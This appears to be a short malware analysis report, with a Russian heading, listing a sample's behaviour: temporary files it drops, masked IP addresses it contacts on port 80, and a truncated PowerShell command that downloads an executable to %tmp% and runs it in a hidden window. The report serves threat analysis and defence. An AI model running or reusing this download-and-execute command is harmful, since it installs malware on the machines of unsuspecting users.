Техническая информация
- $sl как %temp%\tmp037.exe
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#begin#>function sawask([string] $sl){(new-object system.net.webclient).downloadfile($sl,''%tmp%\tmp037.exe'');<#add info#>start-process ''%tmp%\tmp037.exe'';}try{...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\1136701.cvr
- %TEMP%\tmp294.bat
- '46.##3.218.70':80
- '46.##3.218.72':80
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""<#begin#>function sawask([string] $sl){(new-object system.net.webclient).downloadfile($sl,''%tmp%\tmp037.exe'');<#add info#>start-process ''%tmp%\tmp037.exe'';}try{...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp294.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp294.bat" "